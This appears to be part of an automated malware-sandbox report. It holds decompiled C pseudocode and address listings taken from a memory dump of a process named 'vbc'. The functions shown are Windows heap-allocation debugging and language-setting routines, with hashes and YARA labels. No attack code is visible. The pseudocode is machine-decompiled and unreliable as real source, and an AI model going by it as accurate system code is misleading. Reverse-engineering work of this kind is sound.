                                                  0x015da4bb
                                                  0x015da4bb
                                                  0x015da4bd
                                                  0x015da4ff
                                                  0x015da4ff
                                                  0x015da501
                                                  0x015da505
                                                  0x015da50f
                                                  0x015da517
                                                  0x015da51b
                                                  0x015da527
                                                  0x015da52b
                                                  0x01622182
                                                  0x01622185
                                                  0x01622193
                                                  0x01622199
                                                  0x01622199
                                                  0x015da531
                                                  0x015da535
                                                  0x015da538
                                                  0x015da548
                                                  0x015da54b
                                                  0x015da54d
                                                  0x015da553
                                                  0x015da559
                                                  0x01622100
                                                  0x01622103
                                                  0x01622109
                                                  0x0162210f
                                                  0x01622112
                                                  0x01622131
                                                  0x01622136
                                                  0x01622114
                                                  0x01622129
                                                  0x0162212e
                                                  0x0162213c
                                                  0x01622141
                                                  0x01622147
                                                  0x0162214d
                                                  0x01622151
                                                  0x01622154
                                                  0x01622154
                                                  0x01622159
                                                  0x01622159
                                                  0x01622103
                                                  0x015da55f
                                                  0x015da562
                                                  0x015da565
                                                  0x015da567
                                                  0x01622162
                                                  0x015da56d
                                                  0x015da574
                                                  0x015da575
                                                  0x015da579
                                                  0x015da57e
                                                  0x01622169
                                                  0x0162216a
                                                  0x01622170
                                                  0x01622175
                                                  0x01622179
                                                  0x01622179
                                                  0x015da57e
                                                  0x015da584
                                                  0x015da58f
                                                  0x015da58f
                                                  0x015da52b
                                                  0x015da5ad
                                                  0x015da5bc
                                                  0x015da5c1
                                                  0x015da5c6
                                                  0x015da5cb
                                                  0x015da5cd
                                                  0x016221a9
                                                  0x015da5d3
                                                  0x015da5d3
                                                  0x015da5d3
                                                  0x015da5d5
                                                  0x015da5d8
                                                  0x016221b3
                                                  0x016221bc
                                                  0x016221c2
                                                  0x016221cd
                                                  0x016221cf
                                                  0x016221da
                                                  0x016221da
                                                  0x016221da
                                                  0x016221f7
                                                  0x016221f7
                                                  0x016221c2
                                                  0x015da5de
                                                  0x015da5e3
                                                  0x015da5e8
                                                  0x015da5ea
                                                  0x0162220a
                                                  0x015da5f0
                                                  0x015da5f0
                                                  0x015da5f0
                                                  0x015da5f2
                                                  0x015da5f5
                                                  0x01622219
                                                  0x0162221b
                                                  0x0162208c
                                                  0x0162208c
                                                  0x0162208c
                                                  0x01622095
                                                  0x01622096
                                                  0x01622097
                                                  0x01622098
                                                  0x016220a4
                                                  0x016220a5
                                                  0x016220a9
                                                  0x016220a9
                                                  0x00000000
                                                  0x015da5f5
                                                  0x015da4bf
                                                  0x015da4d3
                                                  0x015da4d8
                                                  0x015da4da
                                                  0x01621ede
                                                  0x01621ede
                                                  0x01621ee4
                                                  0x01621ee9
                                                  0x00000000
                                                  0x00000000
                                                  0x01621f07
                                                  0x00000000
                                                  0x01621f07
                                                  0x015da4e0
                                                  0x015da4e5
                                                  0x015da4e7
                                                  0x016220cb
                                                  0x015da4ed
                                                  0x015da4ed
                                                  0x015da4ed
                                                  0x015da4f2
                                                  0x015da4f5
                                                  0x016220d5
                                                  0x016220de
                                                  0x016220e4
                                                  0x016220f6
                                                  0x016220f6
                                                  0x016220e4
                                                  0x015da4fb
                                                  0x00000000
                                                  0x015da4fb
                                                  0x015da4a1
                                                  0x015da4a4
                                                  0x015da4a8
                                                  0x00000000
                                                  0x00000000
                                                  0x015da4aa
                                                  0x015da4ac
                                                  0x00000000
                                                  0x00000000
                                                  0x015da4b2
                                                  0x015da4b5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015da4b5
                                                  0x015da43a
                                                  0x015da340
                                                  0x015da346
                                                  0x015da600
                                                  0x00000000
                                                  0x015da600
                                                  0x015da34f
                                                  0x015da351
                                                  0x015da358
                                                  0x015da3c6
                                                  0x00000000
                                                  0x015da371
                                                  0x015da37a
                                                  0x015da37f
                                                  0x015da382
                                                  0x015da384
                                                  0x015da394
                                                  0x00000000
                                                  0x015da396
                                                  0x015da399
                                                  0x015da3a7
                                                  0x015da3b0
                                                  0x015da3b4
                                                  0x015da3bb
                                                  0x015da3d2
                                                  0x015da3da
                                                  0x015da3df
                                                  0x015da3e1
                                                  0x015da3e5
                                                  0x015da3ea
                                                  0x015da3f0
                                                  0x015da3f0
                                                  0x015da3e1
                                                  0x00000000
                                                  0x015da3bb
                                                  0x015da394

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-523794902
                                                  • Opcode ID: fc128f5208426ea3d8b67852204a686e313e8614f4d4e5adb3890f54cffa036c
                                                  • Instruction ID: 95bff148d2b9523ff479851a52085888bf10a77f93e7d0ca578fd02985872241
                                                  • Opcode Fuzzy Hash: fc128f5208426ea3d8b67852204a686e313e8614f4d4e5adb3890f54cffa036c
                                                  • Instruction Fuzzy Hash: 1842ED316087829FD725CF2CC894A2BBBE6FF89204F18496DE5868B352D774D981CF52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01672D82 Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E01672D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1690e80);
				E0160D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E015B40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E016730C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E015BB150();
						} else {
							E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E015BB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E015CEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01674496(_t181, 0);
						_t177 = L015D4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E016749A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0166FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E015B1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E015E16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01674496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x16a6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x16a6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x16a6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E015BB150();
								} else {
									E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0165D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E015BB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E015BB150();
								} else {
									E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E015BB150("Just allocated block at %p for %Ix bytes\n",  *0x16a6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x16a6378 = 1;
									 *0x16a60c0 = 0;
									asm("int3");
									 *0x16a6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x16a5708; // 0x0
					 *0x16ab1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E0160D130(0, _t177, _t181);
				}
			}





















                                                  0x01672d82
                                                  0x01672d84
                                                  0x01672d89
                                                  0x01672d8e
                                                  0x01672d90
                                                  0x01672d92
                                                  0x01672d97
                                                  0x01672d9a
                                                  0x01672da4
                                                  0x01672dc0
                                                  0x01672dc3
                                                  0x01672dd1
                                                  0x01672dd6
                                                  0x01672dd8
                                                  0x016730a7
                                                  0x016730a7
                                                  0x016730aa
                                                  0x016730aa
                                                  0x016730ad
                                                  0x016730b4
                                                  0x00000000
                                                  0x016730b9
                                                  0x01672de3
                                                  0x01672de8
                                                  0x01672deb
                                                  0x01672dee
                                                  0x01672df1
                                                  0x01672df3
                                                  0x01672dfb
                                                  0x01672dfb
                                                  0x01672df5
                                                  0x01672df5
                                                  0x01672df5
                                                  0x01672e04
                                                  0x01672e0a
                                                  0x01672e0d
                                                  0x01672e11
                                                  0x01672e11
                                                  0x01672e12
                                                  0x01672e15
                                                  0x01672e18
                                                  0x01672e1a
                                                  0x01673027
                                                  0x01673027
                                                  0x0167302d
                                                  0x01673030
                                                  0x0167304f
                                                  0x01673054
                                                  0x01673032
                                                  0x01673047
                                                  0x0167304c
                                                  0x0167305a
                                                  0x01673063
                                                  0x00000000
                                                  0x01672e20
                                                  0x01672e20
                                                  0x01672e23
                                                  0x00000000
                                                  0x00000000
                                                  0x01672e29
                                                  0x01672e2b
                                                  0x01672e47
                                                  0x01672e2d
                                                  0x01672e33
                                                  0x01672e38
                                                  0x01672e3f
                                                  0x01672e42
                                                  0x01672e42
                                                  0x01672e4e
                                                  0x01672e5d
                                                  0x01672e5f
                                                  0x01672e62
                                                  0x01672e66
                                                  0x01672e6b
                                                  0x01672e6d
                                                  0x00000000
                                                  0x01672e73
                                                  0x01672e73
                                                  0x01672e76
                                                  0x01672e7a
                                                  0x01672e83
                                                  0x01672e83
                                                  0x01672e83
                                                  0x01672e85
                                                  0x01672e87
                                                  0x01672e8a
                                                  0x01672e8d
                                                  0x01672e92
                                                  0x01672e9c
                                                  0x01672e9f
                                                  0x01672ea1
                                                  0x01672ea2
                                                  0x01672ea6
                                                  0x01672ea6
                                                  0x01672e9f
                                                  0x01672eab
                                                  0x01672eaf
                                                  0x01672edf
                                                  0x01672ee2
                                                  0x01672ee5
                                                  0x01672eb1
                                                  0x01672eb3
                                                  0x01672eb8
                                                  0x01672ebd
                                                  0x01672ec4
                                                  0x01672ed6
                                                  0x01672ec6
                                                  0x01672ec7
                                                  0x01672ecc
                                                  0x01672ecf
                                                  0x01672ed2
                                                  0x01672ed2
                                                  0x01672ed9
                                                  0x01672ed9
                                                  0x01672ee8
                                                  0x01672eeb
                                                  0x01672eef
                                                  0x01672ef2
                                                  0x01672efe
                                                  0x01672f04
                                                  0x01672f04
                                                  0x01672f04
                                                  0x01672f06
                                                  0x01672f0d
                                                  0x01672f0f
                                                  0x01672f13
                                                  0x01672f13
                                                  0x01672f1b
                                                  0x01672f21
                                                  0x01672f27
                                                  0x01672f95
                                                  0x01672f98
                                                  0x01672f9b
                                                  0x01672fa0
                                                  0x00000000
                                                  0x00000000
                                                  0x01672fa6
                                                  0x01672fa9
                                                  0x01672fac
                                                  0x00000000
                                                  0x00000000
                                                  0x01672fb2
                                                  0x01672fb9
                                                  0x00000000
                                                  0x00000000
                                                  0x01672fc3
                                                  0x01672fca
                                                  0x00000000
                                                  0x00000000
                                                  0x01672fd0
                                                  0x01672fd6
                                                  0x01672fd9
                                                  0x01672ff8
                                                  0x01672ffd
                                                  0x01672fdb
                                                  0x01672ff0
                                                  0x01672ff5
                                                  0x0167300e
                                                  0x0167300f
                                                  0x0167301a
                                                  0x00000000
                                                  0x01672f29
                                                  0x01672f29
                                                  0x01672f2c
                                                  0x01672f4b
                                                  0x01672f50
                                                  0x01672f2e
                                                  0x01672f43
                                                  0x01672f48
                                                  0x01672f56
                                                  0x01672f64
                                                  0x01672f6c
                                                  0x01672f6c
                                                  0x01672f72
                                                  0x01672f76
                                                  0x01672f7c
                                                  0x01672f83
                                                  0x01672f89
                                                  0x01672f8a
                                                  0x01672f8a
                                                  0x00000000
                                                  0x01672f76
                                                  0x01672f27
                                                  0x01672e6d
                                                  0x01672da6
                                                  0x01672dab
                                                  0x01672db3
                                                  0x01672db9
                                                  0x016730bc
                                                  0x016730c1
                                                  0x016730c1

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 0-1745908468
                                                  • Opcode ID: 161acb2e1b7930d2c4972b9348dab3d910ab187891e576def66c68b6c03ff8a5
                                                  • Instruction ID: 908ffeb4fe051bf0cee2f48819b90d1ebba847060559c911258f5e29317c205d
                                                  • Opcode Fuzzy Hash: 161acb2e1b7930d2c4972b9348dab3d910ab187891e576def66c68b6c03ff8a5
                                                  • Instruction Fuzzy Hash: 94913531A00642DFDB22DFA8CC94AADBBF2FF89710F18801DE5465B391C7769942DB14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015C3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E015C3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E015C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E015C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E015C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E015C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E015C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L015D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E015FF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01601370(_t276, 0x1594e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E015FBB40(0,  &_v68, _t170);
									if(L015C43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E015FBB40(_t257,  &_v68, _t243);
								if(L015C43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01601370(_t278, 0x1594e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L015D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E015FF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01601370(_v16, 0x1594e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E015FBB40(_t262,  &_v68, _t244);
								if(L015C43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01601370(_t282, 0x1594e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E015FBB40(_t262,  &_v68, _t201);
							if(L015C43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L015D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E015FF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01601370(_t280, 0x1594e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E015FBB40(_t267,  &_v68, _t245);
							if(L015C43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01601370(_t284, 0x1594e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E015FBB40(_t267,  &_v68, _t224);
						if(L015C43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                  0x015c3d3c
                                                  0x015c3d42
                                                  0x015c3d44
                                                  0x015c3d46
                                                  0x015c3d49
                                                  0x015c3d4c
                                                  0x015c3d4f
                                                  0x015c3d52
                                                  0x015c3d55
                                                  0x015c3d58
                                                  0x015c3d5b
                                                  0x015c3d5f
                                                  0x015c3d61
                                                  0x015c3d66
                                                  0x01618213
                                                  0x01618218
                                                  0x015c4085
                                                  0x015c4088
                                                  0x015c408e
                                                  0x015c4094
                                                  0x015c409a
                                                  0x015c40a0
                                                  0x015c40a6
                                                  0x015c40a9
                                                  0x015c40af
                                                  0x015c40b6
                                                  0x015c40bd
                                                  0x015c40bd
                                                  0x015c3d83
                                                  0x0161821f
                                                  0x01618229
                                                  0x01618238
                                                  0x01618238
                                                  0x0161823d
                                                  0x0161823d
                                                  0x015c3da0
                                                  0x015c3daf
                                                  0x015c3db5
                                                  0x015c3dba
                                                  0x015c3dba
                                                  0x015c3dd4
                                                  0x015c3e94
                                                  0x015c3eab
                                                  0x015c3f6d
                                                  0x015c3f84
                                                  0x015c406b
                                                  0x015c406b
                                                  0x015c406e
                                                  0x015c406e
                                                  0x015c4070
                                                  0x015c4074
                                                  0x01618351
                                                  0x01618351
                                                  0x015c407a
                                                  0x015c407f
                                                  0x0161835d
                                                  0x01618370
                                                  0x01618377
                                                  0x01618379
                                                  0x0161837c
                                                  0x0161837c
                                                  0x0161835d
                                                  0x00000000
                                                  0x015c407f
                                                  0x015c3f8a
                                                  0x015c3f8d
                                                  0x015c3f90
                                                  0x015c3f95
                                                  0x0161830d
                                                  0x0161830f
                                                  0x015c3f9b
                                                  0x015c3fac
                                                  0x015c3fae
                                                  0x015c3fb1
                                                  0x015c3fb1
                                                  0x015c3fb6
                                                  0x01618317
                                                  0x0161831a
                                                  0x00000000
                                                  0x015c3fbc
                                                  0x015c3fc1
                                                  0x015c3fc9
                                                  0x015c3fd7
                                                  0x015c3fda
                                                  0x015c3fdd
                                                  0x015c4021
                                                  0x015c4021
                                                  0x015c4029
                                                  0x015c4030
                                                  0x015c4044
                                                  0x015c4046
                                                  0x015c4046
                                                  0x015c4044
                                                  0x015c4049
                                                  0x01618327
                                                  0x01618334
                                                  0x01618339
                                                  0x0161833c
                                                  0x015c404f
                                                  0x015c404f
                                                  0x015c404f
                                                  0x015c4051
                                                  0x015c4056
                                                  0x015c4063
                                                  0x015c4063
                                                  0x015c4068
                                                  0x00000000
                                                  0x015c4068
                                                  0x015c3fdf
                                                  0x015c3fe2
                                                  0x015c3fe4
                                                  0x015c3fe7
                                                  0x015c3fef
                                                  0x015c4003
                                                  0x015c4005
                                                  0x015c4005
                                                  0x015c400c
                                                  0x015c4013
                                                  0x015c4016
                                                  0x015c4017
                                                  0x015c401b
                                                  0x015c401e
                                                  0x00000000
                                                  0x015c401e
                                                  0x015c3fb6
                                                  0x015c3eb1
                                                  0x015c3eb4
                                                  0x015c3eb7
                                                  0x015c3ebc
                                                  0x016182a9
                                                  0x016182ab
                                                  0x015c3ec2
                                                  0x015c3ed3
                                                  0x015c3ed5
                                                  0x015c3ed8
                                                  0x015c3ed8
                                                  0x015c3edd
                                                  0x016182b3
                                                  0x016182b6
                                                  0x00000000
                                                  0x015c3ee3
                                                  0x015c3ee8
                                                  0x015c3eed
                                                  0x015c3ef0
                                                  0x015c3ef3
                                                  0x015c3f02
                                                  0x015c3f05
                                                  0x015c3f08
                                                  0x016182c0
                                                  0x016182c3
                                                  0x016182c5
                                                  0x016182c8
                                                  0x016182d0
                                                  0x016182e4
                                                  0x016182e6
                                                  0x016182e6
                                                  0x016182ed
                                                  0x016182f4
                                                  0x016182f7
                                                  0x016182f8
                                                  0x016182fc
                                                  0x016182ff
                                                  0x016182ff
                                                  0x015c3f0e
                                                  0x015c3f11
                                                  0x015c3f16
                                                  0x015c3f1d
                                                  0x015c3f31
                                                  0x01618307
                                                  0x01618307
                                                  0x015c3f31
                                                  0x015c3f39
                                                  0x015c3f48
                                                  0x015c3f4d
                                                  0x015c3f50
                                                  0x015c3f50
                                                  0x015c3f53
                                                  0x015c3f58
                                                  0x015c3f65
                                                  0x015c3f65
                                                  0x015c3f6a
                                                  0x00000000
                                                  0x015c3f6a
                                                  0x015c3edd
                                                  0x015c3dda
                                                  0x015c3ddd
                                                  0x015c3de0
                                                  0x015c3de5
                                                  0x01618245
